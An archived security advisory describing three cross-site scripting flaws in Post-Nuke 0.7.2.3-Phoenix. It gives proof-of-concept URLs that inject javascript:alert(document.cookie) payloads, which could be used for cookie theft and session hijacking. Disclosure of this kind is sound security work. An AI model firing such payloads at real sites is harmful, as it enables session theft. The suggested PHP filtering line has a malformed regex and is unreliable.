TUCoPS :: Web :: PHP :: bt407.txt

Cross site scripting in Post-Nuke


Issue :

Cross site scripting in Post-Nuke

Version affected :

Post Nuke 0.7.2.3-Phoenix

Description :

Post-Nuke is a content management system that allow
you to deploy a website easily . Its developers claim
that their product is more secure than competitors .

I found three places when a script can be injected to
be executed in the context of the webpage , making possible
to steal user cookies and hijack their sessions .

http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22
%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@pelu
cas.com

http://www.server.com/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&i
d_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent
_id=0

http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert
(document.cookie);%3E&op=modload&name=Members_List&file=index


Solution :

Althoug I am not a php developer , I think filtering of all not
alfanumeric characters is needed , not just filtering script
tags passed to vars in the url .

$good_var=eregi_replace("[^a-z0-9]+)and([^a-z0-9]+)","0",$var);


You can find a spanish version of this advisory at

http://nautopia.org/vulnerabilidades/postnuke_xss.htm


Regards ,

David F. Madrid ,
Madrid , Spain

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH